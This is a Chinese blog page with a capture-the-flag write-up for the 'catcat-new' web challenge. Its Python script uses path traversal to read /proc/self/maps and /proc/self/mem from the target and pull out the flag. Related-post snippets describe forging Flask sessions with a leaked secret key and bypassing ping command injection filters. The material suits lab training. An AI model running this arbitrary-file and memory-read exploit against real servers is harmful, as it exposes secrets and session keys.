攻防世界-Web(catcat-new)

最新推荐文章于 2024-03-24 16:26:56 发布
最新推荐文章于 2024-03-24 16:26:56 发布
阅读量264 收藏
点赞数
文章标签: 前端 python

获取flag脚本,PS:大佬的Writeup

import requests
import re

baseUrl = "http://IP:端口/info?file=../../../../.."

if __name__ == "__main__":
    url = baseUrl + "/proc/self/maps"
    memInfoList = requests.get(url).text.split("\\n")
    mem = ""
    for i in memInfoList:
        memAddress = re.match(r"([a-z0-9]+)-([a-z0-9]+) rw", i)
        if memAddress:
            start = int(memAddress.group(1), 16)
            end = int(memAddress.group(2), 16)
            infoUrl = baseUrl + "/proc/self/mem&start=" + str(start) + "&end=" + str(end)
            mem = requests.get(infoUrl).text
            if re.findall(r"{[\w]+}", mem):
                print(re.findall(r"\w+{\w+}", mem))
m0_46225652
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全 | CTF】catcat-new
等风来
12-25 1965
读取了/proc/self/maps获得了应用运行的内存映射信息,接下来的思路就是:读取/proc/self/mem获得当前内存的详细信息,由于在app.py的info()方法从HTTP请求中接收了start和end参数,即可传参,从而读取任意文件中任意两个地址之间的数据,最后使用正则表达式匹配字符串\w+{\w+}直接获取flag
utilite:在 Utilite 上启动 Fedora 21 的补丁和说明
06-06
如果从 github 查看器复制,则 setenv catcat 不起作用。 注意:在图形图像上从串行控制台设置 root 密码可能会出现问题。 如果发生这种情况,您可能需要将 sd 卡安装在桌面上并将哈希添加到 /etc/shadow,或者对 ...
CAT猫.zip猫.zip
12-05
CAT猫.zip猫.zip猫.zip猫.zip猫.zip猫.猫.zipzip
import.rb:代替Kernel.require
04-28
import.rb 而不是Kernel.require 。 安装 将此行添加到您的应用程序的Gemfile中: gem 'import.rb' 然后执行: $ bundle 或将其自己安装为: $ gem install import.rb 用法 目录 class Cat def meow puts 'meow meow' end end main.rb require 'import' cat = Import . import ( './cat' ) :: Cat cat . new . meow # => meow meow # Cat # => uninitialized constant Cat (NameError) 发展 签出仓库后,运行bin/setup来安装依赖项。 您也可以运行bin/console进行交互式提示,以进行实验。 要将这个
攻防世界 catcat-new
最新发布
m0_73673698的博客
03-24 575
flask_session的伪造需要用到secret_key,而secret_key的值可以通过内存数据获取。在读取内存数据文件/proc/self/mem之前,我们要先读取/proc/self/maps文件获取可读内容的内存映射地址。file=../../../proc/self/maps,将maps文件返回的内容保存到test.txt中,用脚本去得到secret_key。记得要改一下url啊,不然只能像我这个笨比一样等半天(bushi),拿到secret_key之后我们去伪造session。
catf1ag web题目 WriteUp(wp)
Anton1a的博客
01-16 7633
catf1ag web题目 WriteUp
攻防世界-web-cat
mlws1900的博客
07-18 740
得知执行ping命令,用|,&&,||命令尝试,全部被绕过。看了其他人的wp,得知可以用@进行绕过,且为django开发。django的配置文件路径。搜索ctf,获得flag。试试127.0.0.1。显示如上图,一片空白。
BUUCTF笔记之Web系列部分WriteUp(二)
克格莫
05-17 2069
1、[极客大挑战 2019]Http 不敢置信12世纪了还有这种简单题,我还在拼命扫目录和备份。。。。 在secret.php重发http请求头 Referer: https://www.Sycsecret.com 修改User-Agent为Syclover: 这里伪造来源IP 添加一个字段X-Forwarded-For: 127.0.0.1 拿到flag. ...
攻防世界catcat-new
qq_45955869的博客
05-28 1397
攻防世界catcat-new
【愚公系列】2023年05月 攻防世界-Webcatcat-new
热门推荐
时光隧道
05-26 1万+
任意文件读取漏洞是指攻击者通过在应用程序中输入非法的文件名或路径,从而获取未授权的文件读取权限的漏洞。攻击者可以利用此漏洞来读取系统文件、敏感数据或其他用户数据。这种漏洞通常是由于程序没有正确地检查用户的输入而引起的。建议开发人员在编写应用程序时进行严格的输入验证并使用安全的文件访问方法来避免此类漏洞的发生。
攻防世界-Cat
asenzhenshuai的博客
07-14 2240
攻防世界Cat(XCTF 4th-WHCTF-2017)
攻防世界catcat-new
Fightever_的博客
10-24 1101
不过读/proc/self/mem前要注意,/proc/self/mem内容较多而且存在不可读写部分,直接读取会导致程序崩溃,因此需要搭配/proc/self/maps获取堆栈分布,结合maps的映射信息来确定读的偏移值.大佬读取/proc/self/maps+/proc/self/mem+SECRET_KEY的脚本,可一键获取flag.# 由/proc/self/maps获取可读写的内存地址,再根据这些地址读取/proc/self/mem来获取secret key。,用于获取当前启动进程的完整命令。
2021年“绿盟杯”重庆市大学生信息安全竞赛线上赛-Writeup
末初的CSDN博客
10-24 3819
2021绿盟杯重庆市大学生信息安全竞赛
短学期自闭赛writeup(一)
weixin_43342135的博客
09-04 320
pwn题 真·签到题 : 拿到这道题,丢到虚拟机中去,file查看是个32位的,然后checksec查看, 发现堆栈不可执行,然后用ida查看,反编译一下,然后就看见主函数,发现了主函数的 system(bin/sh); 然后就知道,连上就有shellcode,然后就是ls之后,cat flag就好了。 签到~: 拿到这道题,先去分析发现了shellcode, 接着又发现了read函数,读取了2...
攻防世界 WEB刷题
weixin_73055648的博客
07-11 440
攻防世界web刷题
祥云杯-WRITEUP-bad_cat战队
qq_44005305的博客
02-21 384
先监听后上传,就不会报500的错误了 此时再去submit sessions sessions id 执行拿到shell再 bash -i 2>&1 ,上传一个ew内网穿透(github.com/idlefire/ew…%25EF%25BC%258Cchmod%25E4%25B8%258B "https://github.com/idlefire/ew)%EF%BC%8Cchmod%E4%B8%8B") msf的upload shell执行 ./ew -s rssocks -d 82.157.25.143
攻防世界 WEBcat writeup
qq_45139955的博客
10-25 1047
攻防世界 WEBcat writeup打开题目 打开题目 输入baidu.com 页面毫无反应,但是发现,输入百度的ip时,有不一样 页面执行了ping命令并返回,说明页面有命令执行的功能,想到尝试命令拼接执行和使用管道进行命令执行 发现都报错,应该是系统对字符进行了过滤 输入 | 发现被编码成了%7c 尝试宽字节输入,将7改为a 页面报错,复制下来,打开,发现是django报...
攻防世界/Misc/CatCatCat/解题过程
weixin_38028591的博客
07-06 1185
1.kali strings分析猫猫图片,获得。to Text获得flag。
el-option change
09-06
引中提到了在使用Vue的element-UI库中的select组件时,如果将select放在循环中,可能会遇到触发change事件时无法正确传递被选中项的值和索引的问题。而引用中提到了一个具体的实例,需要根据选择的证书类别来设置证书编号的前缀。最初尝试使用el-select的@change事件来解决,但却多次输出undefined,最终通过改变思路,使用el-option的@click.native原生方法来实现。引用中则给出了一段相关的代码片段。 根据这些引用内容,可以得出el-option组件的change事件无法直接解决问题,因此需要使用其他方法来实现需求。在这个具体的例子中,使用了el-option的@click.native原生方法来实现根据选择的证书类别来设置证书编号的前缀。这样当选择了某个证书类别时,会触发el-option的点击事件,然后通过该事件来改变相应的状态。 综上所述,el-option的change事件无法直接解决问题,需要使用其他方法来实现。在这个例子中,使用了el-option的@click.native事件来实现需求。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [element-ui组件中input等的change事件中传递自定义参数](https://download.csdn.net/download/weixin_38606294/13975651)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vue element-UI使用el-select时@change不能触发的解决方案(通过el-option @click.native原生方法)](https://blog.csdn.net/moshowgame/article/details/109151478)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vue + Element-ui的下拉框el-select获取额外参数详解](https://download.csdn.net/download/weixin_38697471/13965857)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值